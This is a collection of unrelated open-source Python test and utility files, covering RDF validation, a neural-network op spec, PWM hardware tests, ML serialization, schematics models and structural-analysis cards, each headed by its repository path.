@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix dc: <http://purl.org/dc/elements/1.1/> .
@prefix dct: <http://purl.org/dc/terms/> .
@prefix xml: <http://www.w3.org/XML/1998/namespace> .
@prefix xsd: <http://www.w3.org/2001/XMLSchema#> .
@prefix owl: <http://www.w3.org/2002/07/owl#> .
@prefix geo: <http://example.org/geo/> .
@prefix ex: <http://example.com#> .
geo:hasSerialization
a rdfs:Property ;
a owl:DatatypeProperty ;
rdfs:domain geo:Geometry ;
rdfs:range rdfs:Literal ;
.
geo:asWKT
a rdfs:Property ;
a owl:DatatypeProperty ;
rdfs:subPropertyOf geo:hasSerialization ;
rdfs:domain geo:Geometry ;
rdfs:range geo:wktLiteral ;
.
geo:wktLiteral
a rdfs:Datatype ;
dc:description "A Well-known Text serialization of a geometry object." ;
.
ex:Place
a rdfs:Class ;
rdfs:subClassOf geo:Geometry ;
.
ex:test1
a ex:Place ;
geo:asWKT "POINT(45.75 4.85)"^^geo:wktLiteral ;
dc:title "test1" ;
.
"""
def test_071_positive():
data = rdflib.Graph()
data.parse(data=data_file_text, format="turtle")
res = validate(
data,
shacl_graph=shacl_file_text,
data_graph_format='turtle',
shacl_graph_format='turtle',
inference='rdfs',
debug=True,
)
conforms, graph, string = res
assert conforms
if __name__ == "__main__":
test_071_positive()
|
tests/nnapi/specs/V1_0/concat_float_4D_axis3_1_nnfw.mod.py
|
periannath/ONE
| 255 |
100974
|
<gh_stars>100-1000
#
# Copyright (C) 2017 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# model
model = Model()
i1 = Input("op1", "TENSOR_FLOAT32", "{1, 2, 3, 2}") # input tensor 0
i2 = Input("op2", "TENSOR_FLOAT32", "{1, 2, 3, 2}") # input tensor 1
i3 = Input("op3", "TENSOR_FLOAT32", "{1, 2, 3, 2}") # input tensor 2
axis0 = Int32Scalar("axis0", 3)
r = Output("result", "TENSOR_FLOAT32", "{1, 2, 3, 6}") # output
model = model.Operation("CONCATENATION", i1, i2, i3, axis0).To(r)
# Example 1.
input0 = {i1: [-0.03203143, -0.0334147 , -0.02527265, 0.04576106, 0.08869292,
0.06428383, -0.06473722, -0.21933985, -0.05541003, -0.24157837,
-0.16328812, -0.04581105],
i2: [-0.0569439 , -0.15872048, 0.02965238, -0.12761882, -0.00185435,
-0.03297619, 0.03581043, -0.12603407, 0.05999133, 0.00290503,
0.1727029 , 0.03342071],
i3: [ 0.10992613, 0.09185287, 0.16433905, -0.00059073, -0.01480746,
0.0135175 , 0.07129054, -0.15095694, -0.04579685, -0.13260484,
-0.10045543, 0.0647094 ]}
output0 = {r: [-0.03203143, -0.0334147 , -0.0569439 , -0.15872048, 0.10992613,
0.09185287, -0.02527265, 0.04576106, 0.02965238, -0.12761882,
0.16433905, -0.00059073, 0.08869292, 0.06428383, -0.00185435,
-0.03297619, -0.01480746, 0.0135175 , -0.06473722, -0.21933985,
0.03581043, -0.12603407, 0.07129054, -0.15095694, -0.05541003,
-0.24157837, 0.05999133, 0.00290503, -0.04579685, -0.13260484,
-0.16328812, -0.04581105, 0.1727029 , 0.03342071, -0.10045543,
0.0647094 ]}
# Instantiate an example
Example((input0, output0))
'''
# The above data was generated with the code below:
with tf.Session() as sess:
t1 = tf.random_normal([1, 2, 3, 2], stddev=0.1, dtype=tf.float32)
t2 = tf.random_normal([1, 2, 3, 2], stddev=0.1, dtype=tf.float32)
t3 = tf.random_normal([1, 2, 3, 2], stddev=0.1, dtype=tf.float32)
c1 = tf.concat([t1, t2, t3], axis=3)
print(c1) # print shape
print( sess.run([tf.reshape(t1, [12]),
tf.reshape(t2, [12]),
tf.reshape(t3, [12]),
tf.reshape(c1, [1*2*3*(2*3)])]))
'''
|
tests/test_pwm.py
|
CrazyIvan359/python-periphery
| 433 |
100993
|
import os
import sys
import periphery
from .test import ptest, pokay, passert, AssertRaises
if sys.version_info[0] == 3:
raw_input = input
pwm_chip = None
pwm_channel = None
def test_arguments():
ptest()
# Invalid open types
with AssertRaises("invalid open types", TypeError):
periphery.PWM("foo", 0)
with AssertRaises("invalid open types", TypeError):
periphery.PWM(0, "foo")
def test_open_close():
ptest()
# Open non-existent PWM chip
with AssertRaises("non-existent PWM chip", LookupError):
periphery.PWM(9999, pwm_channel)
# Open non-existent PWM channel
with AssertRaises("non-existent PWM channel", periphery.PWMError):
periphery.PWM(pwm_chip, 9999)
# Open legitimate PWM chip/channel
pwm = periphery.PWM(pwm_chip, pwm_channel)
passert("property chip", pwm.chip == pwm_chip)
passert("property channel", pwm.channel == pwm_channel)
# Initialize period and duty cycle
pwm.period = 5e-3
pwm.duty_cycle = 0
# Set period, check period, check period_ns, check frequency
pwm.period = 1e-3
passert("period is correct", abs(pwm.period - 1e-3) < 1e-4)
passert("period_ns is correct", abs(pwm.period_ns - 1000000) < 1e5)
passert("frequency is correct", abs(pwm.frequency - 1000) < 100)
pwm.period = 5e-4
passert("period is correct", abs(pwm.period - 5e-4) < 1e-5)
passert("period_ns is correct", abs(pwm.period_ns - 500000) < 1e4)
passert("frequency is correct", abs(pwm.frequency - 2000) < 100)
# Set frequency, check frequency, check period, check period_ns
pwm.frequency = 1000
passert("frequency is correct", abs(pwm.frequency - 1000) < 100)
passert("period is correct", abs(pwm.period - 1e-3) < 1e-4)
passert("period_ns is correct", abs(pwm.period_ns - 1000000) < 1e5)
pwm.frequency = 2000
passert("frequency is correct", abs(pwm.frequency - 2000) < 100)
passert("period is correct", abs(pwm.period - 5e-4) < 1e-5)
passert("period_ns is correct", abs(pwm.period_ns - 500000) < 1e4)
# Set period_ns, check period_ns, check period, check frequency
pwm.period_ns = 1000000
passert("period_ns is correct", abs(pwm.period_ns - 1000000) < 1e5)
passert("period is correct", abs(pwm.period - 1e-3) < 1e-4)
passert("frequency is correct", abs(pwm.frequency - 1000) < 100)
pwm.period_ns = 500000
passert("period_ns is correct", abs(pwm.period_ns - 500000) < 1e4)
passert("period is correct", abs(pwm.period - 5e-4) < 1e-5)
passert("frequency is correct", abs(pwm.frequency - 2000) < 100)
pwm.period_ns = 1000000
# Set duty cycle, check duty cycle, check duty_cycle_ns
pwm.duty_cycle = 0.25
passert("duty_cycle is correct", abs(pwm.duty_cycle - 0.25) < 1e-3)
passert("duty_cycle_ns is correct", abs(pwm.duty_cycle_ns - 250000) < 1e4)
pwm.duty_cycle = 0.50
passert("duty_cycle is correct", abs(pwm.duty_cycle - 0.50) < 1e-3)
passert("duty_cycle_ns is correct", abs(pwm.duty_cycle_ns - 500000) < 1e4)
pwm.duty_cycle = 0.75
passert("duty_cycle is correct", abs(pwm.duty_cycle - 0.75) < 1e-3)
passert("duty_cycle_ns is correct", abs(pwm.duty_cycle_ns - 750000) < 1e4)
# Set duty_cycle_ns, check duty_cycle_ns, check duty_cycle
pwm.duty_cycle_ns = 250000
passert("duty_cycle_ns is correct", abs(pwm.duty_cycle_ns - 250000) < 1e4)
passert("duty_cycle is correct", abs(pwm.duty_cycle - 0.25) < 1e-3)
pwm.duty_cycle_ns = 500000
passert("duty_cycle_ns is correct", abs(pwm.duty_cycle_ns - 500000) < 1e4)
passert("duty_cycle is correct", abs(pwm.duty_cycle - 0.50) < 1e-3)
pwm.duty_cycle_ns = 750000
passert("duty_cycle_ns is correct", abs(pwm.duty_cycle_ns - 750000) < 1e4)
passert("duty_cycle is correct", abs(pwm.duty_cycle - 0.75) < 1e-3)
# Set polarity, check polarity
pwm.polarity = "normal"
passert("polarity is normal", pwm.polarity == "normal")
pwm.polarity = "inversed"
passert("polarity is inversed", pwm.polarity == "inversed")
# Set enabled, check enabled
pwm.enabled = True
passert("pwm is enabled", pwm.enabled == True)
pwm.enabled = False
passert("pwm is disabled", pwm.enabled == False)
# Use enable()/disable(), check enabled
pwm.enable()
passert("pwm is enabled", pwm.enabled == True)
pwm.disable()
passert("pwm is disabled", pwm.enabled == False)
# Set invalid polarity
with AssertRaises("set invalid polarity", ValueError):
pwm.polarity = "foo"
pwm.close()
def test_loopback():
ptest()
def test_interactive():
ptest()
pwm = periphery.PWM(pwm_chip, pwm_channel)
print("Starting interactive test. Get out your oscilloscope, buddy!")
raw_input("Press enter to continue...")
# Set initial parameters and enable PWM
pwm.duty_cycle = 0.0
pwm.frequency = 1e3
pwm.polarity = "normal"
pwm.enabled = True
# Check tostring
print("PWM description: {}".format(str(pwm)))
passert("interactive success", raw_input("PWM description looks ok? y/n ") == "y")
# Set 1 kHz frequency, 0.25 duty cycle
pwm.frequency = 1e3
pwm.duty_cycle = 0.25
passert("interactive success", raw_input("Frequency is 1 kHz, duty cycle is 25%? y/n ") == "y")
# Set 1 kHz frequency, 0.50 duty cycle
pwm.frequency = 1e3
pwm.duty_cycle = 0.50
passert("interactive success", raw_input("Frequency is 1 kHz, duty cycle is 50%? y/n ") == "y")
# Set 2 kHz frequency, 0.25 duty cycle
pwm.frequency = 2e3
pwm.duty_cycle = 0.25
passert("interactive success", raw_input("Frequency is 2 kHz, duty cycle is 25%? y/n ") == "y")
# Set 2 kHz frequency, 0.50 duty cycle
pwm.frequency = 2e3
pwm.duty_cycle = 0.50
passert("interactive success", raw_input("Frequency is 2 kHz, duty cycle is 50%? y/n ") == "y")
pwm.duty_cycle = 0.0
pwm.enabled = False
pwm.close()
if __name__ == "__main__":
if os.environ.get("CI") == "true":
test_arguments()
sys.exit(0)
if len(sys.argv) < 3:
print("Usage: python -m tests.test_pwm <PWM chip> <PWM channel>")
print("")
print("[1/4] Arguments test: No requirements.")
print("[2/4] Open/close test: PWM channel should be real.")
print("[3/4] Loopback test: No test.")
print("[4/4] Interactive test: PWM channel should be observed with an oscilloscope or logic analyzer.")
print("")
print("Hint: for Raspberry Pi 3, enable PWM0 and PWM1 with:")
print(" $ echo \"dtoverlay=pwm-2chan,pin=18,func=2,pin2=13,func2=4\" | sudo tee -a /boot/config.txt")
print(" $ sudo reboot")
print("Monitor GPIO 18 (header pin 12), and run this test with:")
print(" python -m tests.test_pwm 0 0")
print("or, monitor GPIO 13 (header pin 33), and run this test with:")
print(" python -m tests.test_pwm 0 1")
print("")
sys.exit(1)
pwm_chip = int(sys.argv[1])
pwm_channel = int(sys.argv[2])
test_arguments()
pokay("Arguments test passed.")
test_open_close()
pokay("Open/close test passed.")
test_loopback()
pokay("Loopback test passed.")
test_interactive()
pokay("Interactive test passed.")
pokay("All tests passed!")
|
marley/worlds/blackjack/__init__.py
|
cool-RR/grid_royale
| 255 |
100997
|
<reponame>cool-RR/grid_royale<gh_stars>100-1000
# Copyright 2020 <NAME> and collaborators.
# This program is distributed under the MIT license.
from .core import *
from .sharknadoing import *
from .commanding import command_group
|
python/tests/sklearn/preprocessing/one_hot_encoder_test.py
|
voganrc/mleap
| 1,401 |
101008
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import shutil
import tempfile
import unittest
import numpy as np
from mleap.sklearn.preprocessing.data import LabelEncoder
from mleap.sklearn.preprocessing.data import OneHotEncoder
class TestOneHotEncoder(unittest.TestCase):
def setUp(self):
labels = ['a', 'b', 'c', 'a', 'b', 'b']
self.le = LabelEncoder(input_features=['label'], output_features='label_le_encoded')
self.oh_data = self.le.fit_transform(labels).reshape(-1, 1)
self.tmp_dir = tempfile.mkdtemp(prefix="mleap.python.tests")
def tearDown(self):
shutil.rmtree(self.tmp_dir)
def test_one_hot_encoder_serialization_fails_on_multiple_feature_columns(self):
self.oh_data = np.hstack((self.oh_data, self.oh_data)) # make two feature columns
ohe = OneHotEncoder(handle_unknown='error')
ohe.mlinit(prior_tf=self.le, output_features='{}_one_hot_encoded'.format(self.le.output_features))
ohe.fit(self.oh_data)
with self.assertRaises(NotImplementedError):
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
def test_one_hot_encoder_serialization_fails_on_an_invalid_category_range(self):
self.oh_data[2][0] = 3 # make invalid category range
ohe = OneHotEncoder(handle_unknown='error')
ohe.mlinit(prior_tf=self.le, output_features='{}_one_hot_encoded'.format(self.le.output_features))
ohe.fit(self.oh_data)
with self.assertRaises(ValueError):
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
def test_one_hot_encoder_serialization_fails_when_using_the_drop_param(self):
ohe = OneHotEncoder(handle_unknown='error', drop='first') # try to use `drop` parameter
ohe.mlinit(prior_tf=self.le, output_features='{}_one_hot_encoded'.format(self.le.output_features))
ohe.fit(self.oh_data)
with self.assertRaises(NotImplementedError):
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
def test_one_hot_encoder_serialization_fails_when_using_the_dtype_param(self):
ohe = OneHotEncoder(handle_unknown='error', dtype=int) # try to use `dtype` parameter
ohe.mlinit(prior_tf=self.le, output_features='{}_one_hot_encoded'.format(self.le.output_features))
ohe.fit(self.oh_data)
with self.assertRaises(NotImplementedError):
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
def test_one_hot_encoder_serialization_succeeds_when_handle_unknown_is_set_to_error(self):
ohe = OneHotEncoder(handle_unknown='error')
ohe.mlinit(prior_tf=self.le, output_features='{}_one_hot_encoded'.format(self.le.output_features))
ohe.fit(self.oh_data)
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
with open("{}/{}.node/model.json".format(self.tmp_dir, ohe.name)) as json_data:
model = json.load(json_data)
self.assertEqual('one_hot_encoder', model['op'])
self.assertEqual(3, model['attributes']['size']['long'])
self.assertEqual('error', model['attributes']['handle_invalid']['string'])
self.assertEqual(False, model['attributes']['drop_last']['boolean'])
def test_one_hot_encoder_deserialization_succeeds_when_handle_unknown_is_set_to_error(self):
ohe = OneHotEncoder(handle_unknown='error')
ohe.mlinit(prior_tf=self.le, output_features='{}_one_hot_encoded'.format(self.le.output_features))
ohe.fit(self.oh_data)
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
node_name = "{}.node".format(ohe.name)
ohe_ds = OneHotEncoder()
ohe_ds.deserialize_from_bundle(self.tmp_dir, node_name)
self.oh_data[2][0] = 3 # Add an unknown category
with self.assertRaises(ValueError):
ohe_ds.transform(self.oh_data)
def test_one_hot_encoder_serialization_succeeds_when_handle_unknown_is_set_to_ignore(self):
labels = ['a', 'b', 'c', 'a', 'b', 'b']
le = LabelEncoder(input_features=['label'], output_features='label_le_encoded')
oh_data = le.fit_transform(labels).reshape(-1, 1)
ohe = OneHotEncoder(handle_unknown='ignore')
ohe.mlinit(prior_tf=le, output_features='{}_one_hot_encoded'.format(le.output_features))
ohe.fit(oh_data)
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
with open("{}/{}.node/model.json".format(self.tmp_dir, ohe.name)) as json_data:
model = json.load(json_data)
self.assertEqual('one_hot_encoder', model['op'])
self.assertEqual(3, model['attributes']['size']['long'])
self.assertEqual('keep', model['attributes']['handle_invalid']['string'])
self.assertEqual(True, model['attributes']['drop_last']['boolean'])
def test_one_hot_encoder_deserialization_succeeds_when_handle_unknown_is_set_to_ignore(self):
ohe = OneHotEncoder(handle_unknown='ignore')
ohe.mlinit(prior_tf=self.le, output_features='{}_one_hot_encoded'.format(self.le.output_features))
ohe.fit(self.oh_data)
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
node_name = "{}.node".format(ohe.name)
ohe_ds = OneHotEncoder()
ohe_ds.deserialize_from_bundle(self.tmp_dir, node_name)
self.oh_data[2][0] = 3 # Add an unknown category
expected = ohe.transform(self.oh_data).todense()
actual = ohe_ds.transform(self.oh_data)
np.testing.assert_array_equal(expected, actual)
|
tests/v1/id.py
|
tombry/virlutils
| 133 |
101029
|
<filename>tests/v1/id.py
from . import BaseTest
from .mocks.api import MockVIRLServer
from click.testing import CliRunner
import requests_mock
from virl.cli.main import virl
class IdTest(BaseTest):
def test_virl_id_nosim(self):
with requests_mock.mock() as m:
# Mock the request to return what we expect from the API.
m.get('http://localhost:19399/simengine/rest/list',
json=MockVIRLServer.list_simulations())
runner = CliRunner()
result = runner.invoke(virl, ["id"])
self.assertEqual("virlutils-id\n", result.output)
|
scripts/parseLog.py
|
Kandongwe/RunestoneServer
| 344 |
101062
|
<filename>scripts/parseLog.py
#!/usr/bin/env python3
# {address space usage: 359067648 bytes/342MB} {rss usage: 107823104 bytes/102MB} [pid: 11266|app: 0|req: 99163/885977] 172.16.31.10 () {48 vars in 1249 bytes} [Thu Feb 15 16:28:43 2018] GET /runestone/ajax/getnumonline => generated 16 bytes in 2553 msecs (HTTP/1.1 200) 8 headers in 381 bytes (1 switches on core 0)
import re, sys
timepat = re.compile(r'.*\[((Mon|Tue|Wed|Thu|Fri|Sat|Sun) (Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec).*\d\d\d\d)\].*/runestone/ajax/(\w+)(\s|\?).*\s(\d+)\s+msecs.*')
logfile = open(sys.argv[1], 'r')
for line in logfile:
g = timepat.match(line)
if g:
print("{},{},{}".format(g.group(1),g.group(4), g.group(6)))
|
python/_impl.py
|
gglin001/poptorch
| 128 |
101073
|
<gh_stars>100-1000
# Copyright (c) 2020 Graphcore Ltd. All rights reserved.
from contextlib import contextmanager
import copy
import fcntl
import hashlib
import os
from typing import Dict, Any
import torch
# Do not import any poptorch.* here: it will break the poptorch module
from ._logging import logger
from . import poptorch_core
# A flag to tell the user if the current target is IPU. This is to allow
# divergent IPU/CPU codepaths within one model.
_is_ipu_context = False
def createPoptorchError(msg):
type = "poptorch_py_error"
error = poptorch_core.Error(f"'{type}': {msg}")
error.type = type
error.message = msg
error.location = ""
return error
def isRunningOnIpu() -> bool:
""" This function returns `True` when executing on IPU and `False` when
executing the model outside IPU scope. This allows for separate
codepaths to be marked in the model simply by using:
>>> if poptorch.isRunningOnIpu():
>>> # IPU path
>>> else:
>>> # CPU path
Note this will only apply to code during execution. During model
creation it will always return `False`.
:returns: True if running on IPU, otherwise False.
"""
global _is_ipu_context
return _is_ipu_context
def setIpuContext(val: bool):
global _is_ipu_context
_is_ipu_context = val
def internal_cast(tensor, dtype):
if dtype in [torch.float, torch.float32]:
return torch.ops.poptorch.internal_cast(tensor, "FLOAT")
if dtype in [torch.half, torch.float16]:
return torch.ops.poptorch.internal_cast(tensor, "FLOAT16")
raise ValueError(
'Invalid poptorch.cast target type. Expecting torch.float or torch.half'
)
def applyOptimizer(optimizer):
num_groups = len(optimizer.param_groups)
for index in range(0, num_groups):
torch.ops.poptorch.optimizer_group(
index, optimizer.param_groups[index]["params"])
# To understand which variable groups the user wants to apply the
# optimizer to we need to mark them via a wrapper. We do this because
# when we reference the variables in the context of the operation we
# get the corresponding IR value for "free" as part of the trace.
# Otherwise we would need a system to map the variable in the optimizer
# to the variable in the model to the variable in the IR.
class OptimizerWrapper(torch.nn.Module):
def __init__(self, model, optimizer):
super().__init__()
self.model = model
self.optimizer = optimizer
def forward(self, *args, **kwargs):
out = self.model(*args, **kwargs)
applyOptimizer(self.optimizer)
return out
@contextmanager
def distributedCacheLock(model, opts):
"""In a distributed environment we only want the model to be compiled once.
If there is only one process or if the cache is not enabled:
no need for a lock, early return.
Otherwise:
The first process to reach the lock takes it and compiles the model.
The model will be added to the PopART cache.
After the first process releases the lock the other ones will grab it
one at the time and compile the model too (Except that they will
now all hit the cache).
The last process to grab / release the lock will delete the file.
(Each process append a character to the file, so the position in
the file when acquiring the lock indicates how many processes have
already successfully compiled the model).
"""
filename = None
if opts.Distributed.numProcesses > 1:
cache = opts._popart.options.get("cachePath", "") # pylint: disable=protected-access
if not cache:
logger.warning(
"Use poptorch.Options.enableExecutableCaching() to avoid "
"compiling the model once per process")
else:
os.makedirs(cache, exist_ok=True)
assert os.access(cache, os.W_OK), (f"Cache folder {cache}"
" is not writable")
filename = os.path.join(
cache, "%s.lock" %
hashlib.md5(repr(model).encode("utf-8")).hexdigest())
# Not distributed mode or the cache is not enabled: do nothing.
if not filename:
yield False
return
delete_file = False
try:
with open(filename, "a+") as f:
try:
fcntl.flock(f, fcntl.LOCK_EX)
# Add a character to the file
f.write("0")
logger.debug(
"Executable cache file locked by process %s (pos %d/%d)",
opts.Distributed.processId, f.tell(),
opts.Distributed.numProcesses)
delete_file = f.tell() == opts.Distributed.numProcesses
# Only the first process should compile
yield f.tell() == 1
finally:
logger.debug("Process %s released the cache lock",
opts.Distributed.processId)
fcntl.flock(f, fcntl.LOCK_UN)
finally:
if delete_file:
os.remove(filename)
# The pickle handlers are called in two cases: when an object is copied
# (i.e copy.copy(obj)) or when an object is pickled / serialised.
# In both cases the object is first dumped using pickleUnwrapModel and then
# in the copy case _pickleRestoreWrapperIfPossible() is called immediately after
# to create the new object.
#
# The _wrapper_registry keeps track of the mapping between user model, parameter,
# buffer types and their corresponding wrapper.
# When an object is copied we want to preserve the Wrapper type: the PopTorch
# wrapper doesn't contain any attribute so it's just a question of updating
# the __class__attribute.
#
# When an object is loaded from file: the wrapper type doesn't exist anymore
# therefore we keep the object unwrapped. (It will be wrapped again when passed
# to poptorch.trainingModel anyway)
_wrapper_registry: Dict[int, Any] = {}
def _pickleRestoreWrapperIfPossible(obj):
wrapperType = _wrapper_registry.get(id(obj))
if wrapperType:
obj.__class__ = wrapperType
return obj
def pickleUnwrapObject(obj):
global _wrapper_registry
wrapperType = obj.__class__
obj.__class__ = obj.__class__.__bases__[0]
other = copy.copy(obj)
_wrapper_registry[id(other)] = wrapperType
obj.__class__ = wrapperType
return _pickleRestoreWrapperIfPossible, (other, )
|
third_party/gsutil/third_party/rsa/tests/test_parallel.py
|
tingshao/catapult
| 5,079 |
101113
|
"""Test for multiprocess prime generation."""
import unittest
import rsa.prime
import rsa.parallel
import rsa.common
class ParallelTest(unittest.TestCase):
"""Tests for multiprocess prime generation."""
def test_parallel_primegen(self):
p = rsa.parallel.getprime(1024, 3)
self.assertFalse(rsa.prime.is_prime(p - 1))
self.assertTrue(rsa.prime.is_prime(p))
self.assertFalse(rsa.prime.is_prime(p + 1))
self.assertEqual(1024, rsa.common.bit_size(p))
|
tests/test_model_type.py
|
Attsun1031/schematics
| 1,430 |
101135
|
<gh_stars>1000+
import pytest
from schematics.models import Model
from schematics.types import IntType, StringType
from schematics.types.compound import ModelType, ListType
from schematics.exceptions import DataError
from schematics.util import ImportStringError
def test_simple_embedded_models():
class Location(Model):
country_code = StringType()
class Player(Model):
id = IntType()
location = ModelType(Location)
p = Player(dict(id=1, location={"country_code": "US"}))
assert p.id == 1
assert p.location.country_code == "US"
p.location = Location({"country_code": "IS"})
assert isinstance(p.location, Location)
assert p.location.country_code == "IS"
def test_simple_embedded_models_is_none():
class Location(Model):
country_code = StringType()
class Player(Model):
id = IntType()
location = ModelType(Location)
p = Player(dict(id=1))
assert p.id == 1
assert p.location is None
def test_simple_embedded_model_set_to_none():
class Location(Model):
country_code = StringType()
class Player(Model):
id = IntType()
location = ModelType(Location)
p = Player(dict(id=1))
p.location = None
assert p.id == 1
assert p.location is None
def test_simple_embedded_model_is_none_within_listtype():
class QuestionResources(Model):
type = StringType()
class Question(Model):
id = StringType()
resources = ModelType(QuestionResources)
class QuestionPack(Model):
id = StringType()
questions = ListType(ModelType(Question))
question_pack = QuestionPack({
"id": "1",
"questions": [
{
"id": "1",
},
]
})
assert question_pack.questions[0].resources is None
def test_raises_validation_error_on_init_with_partial_submodel():
class User(Model):
name = StringType(required=True)
age = IntType(required=True)
class Card(Model):
user = ModelType(User)
u = User({'name': 'Arthur'})
c = Card({'user': u})
with pytest.raises(DataError):
c.validate()
def test_model_type():
class User(Model):
name = StringType()
class Card(Model):
user = ModelType(User)
c = Card({"user": {'name': u'Doggy'}})
assert isinstance(c.user, User)
assert c.user.name == "Doggy"
def test_equality_with_embedded_models():
class Location(Model):
country_code = StringType()
class Player(Model):
id = IntType()
location = ModelType(Location)
p1 = Player(dict(id=1, location={"country_code": "US"}))
p2 = Player(dict(id=1, location={"country_code": "US"}))
assert id(p1.location) != id(p2.location)
assert p1.location == p2.location
assert p1 == p2
def test_default_value_when_embedded_model():
class Question(Model):
question_id = StringType(required=True)
type = StringType(default="text")
class QuestionPack(Model):
question = ModelType(Question)
pack = QuestionPack({
"question": {
"question_id": 1
}
})
assert pack.question.question_id == "1"
assert pack.question.type == "text"
def test_export_loop_with_subclassed_model():
class Asset(Model):
file_name = StringType()
class S3Asset(Asset):
bucket_name = StringType()
class Product(Model):
title = StringType()
asset = ModelType(Asset)
asset = S3Asset({'bucket_name': 'assets_bucket', 'file_name': 'bar'})
product = Product({'title': 'baz', 'asset': asset})
primitive = product.to_primitive()
assert 'bucket_name' in primitive['asset']
native = product.to_native()
assert 'bucket_name' in native['asset']
def test_conversion_error_recursive_overhead():
conversions = [0]
class Leaf(Model):
pass
next_model = Leaf
data = 'not a mapping'
for i in range(20):
class Recursive(Model):
x = ModelType(next_model, required=True)
def __init__(self, *args, **kwargs):
super(type(self), self).__init__(*args, **kwargs)
conversions[0] += 1
assert conversions[0] < 25
next_model = Recursive
data = {'x': data}
with pytest.raises(DataError):
next_model(data)
def test_mock_object():
class User(Model):
name = StringType(required=True)
age = IntType(required=True)
assert ModelType(User, required=True).mock() is not None
def test_specify_model_by_name():
class M(Model):
to_one = ModelType('M')
to_many = ListType(ModelType('M'))
matrix = ListType(ListType(ModelType('M')))
assert M.to_one.model_class is M
assert M.to_many.field.model_class is M
assert M.matrix.field.field.model_class is M
def test_model_context_pass_to_type():
from schematics.types import BaseType
from schematics.datastructures import Context
class CustomType(BaseType):
def to_native(self, value, context=None):
suffix = context.suffix
return str(value) + suffix
def to_primitive(self, value, context=None):
suffix = context.suffix
return value[:-len(suffix)]
class Thing(Model):
x = CustomType()
context = {'suffix': 'z'}
input = {'x': 'thingie'}
thing = Thing(input, context=context)
assert thing.x == 'thingiez'
assert thing.to_primitive(context=context) == {'x': 'thingie'}
# try it with a Context object
model_context = Context(suffix='z!')
thing2 = Thing(input, context=model_context)
assert thing2.x == 'thingiez!'
export_context = Context(suffix='z!')
assert thing2.to_primitive(context=export_context) == {'x': 'thingie'}
with pytest.raises(AttributeError):
# can't reuse the same Context object as was used for model
# TODO this may be unexpected to the uninitiated; a custom exception
# could explain it better.
thing2.to_primitive(context=model_context)
def test_model_app_data_pass_to_type():
from schematics.types import BaseType
class CustomType(BaseType):
def to_native(self, value, context=None):
suffix = context.app_data['suffix']
return str(value) + suffix
def to_primitive(self, value, context=None):
suffix = context.app_data['suffix']
return value[:-len(suffix)]
class Thing(Model):
x = CustomType()
app_data = {'suffix': 'z'}
input = {'x': 'thingie'}
thing = Thing(input, app_data=app_data)
assert thing.x == 'thingiez'
assert thing.to_primitive(app_data=app_data) == {'x': 'thingie'}
class OuterModel:
class InnerModel(Model):
test = StringType()
def test_deep_string_search():
class TestModel(Model):
deep_model = ModelType('test_model_type.OuterModel.InnerModel')
test = TestModel(dict(deep_model=dict(test='Abc')))
assert test.validate() is None
class TestModel2(Model):
invalid_model = ModelType('a.c.d.e')
with pytest.raises(ImportStringError):
TestModel2(dict(invalid_model=dict(a='1')))
def test_recursive_string_self_reference():
class RecursiveTestModel(Model):
recursive_model = ModelType('RecursiveTestModel')
test = StringType()
test = RecursiveTestModel(dict(recursive_model=dict(test='Abc')))
assert test.validate() is None
assert test.recursive_model.test == 'Abc'
def test_circular_string_reference():
class TestModel1(Model):
model2 = ModelType('TestModel2')
name = StringType()
class TestModel2(Model):
model1 = ModelType('TestModel1')
description = StringType()
data1 = {'name': 'Test1'}
data2 = {'description': 'Test2', 'model1': data1}
# TODO: we might want to support locals import late binding someday/somehow
with pytest.raises(ImportStringError):
test = TestModel1({
'name': 'Root',
'model2': data2
})
|
pyNastran/bdf/cards/test/test_bars.py
|
ACea15/pyNastran
| 293 |
101140
|
import os
import unittest
import numpy as np
from pyNastran.bdf.bdf import BDF, BDFCard, CBAR, PBAR, PBARL, GRID, MAT1
from pyNastran.bdf.field_writer_8 import print_card_8
from pyNastran.bdf.mesh_utils.mass_properties import (
mass_properties, mass_properties_nsm) #mass_properties_breakdown
from pyNastran.bdf.cards.test.utils import save_load_deck
from pyNastran.bdf.mesh_utils.loads import sum_forces_moments, sum_forces_moments_elements
class TestBars(unittest.TestCase):
"""test CBAR/PBAR/PBARL classes"""
def test_pbar_1(self):
"""tests the PBAR BDF add"""
area = 0.0
i11 = 4.9e-2
i22 = 5.5e-2
i12 = 6.6e-2
j = 7.7e-2
nsm = 1.0
fields = [
u'PBAR', 1510998, 1520998, area, i11,
i22, j, nsm, None, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, None, None, i12,
]
card = print_card_8(fields)
#print(card)
card = print_card_8(fields)
lines = card.split('\n')
model = BDF(debug=False)
card = model._process_card(lines)
cardi = BDFCard(card)
pbar = PBAR.add_card(cardi)
pbar.raw_fields()
self.assertEqual(pbar.A, area)
self.assertEqual(pbar.i1, i11)
self.assertEqual(pbar.i2, i22)
self.assertEqual(pbar.i12, i12)
self.assertEqual(pbar.j, j)
self.assertEqual(pbar.k1, None)
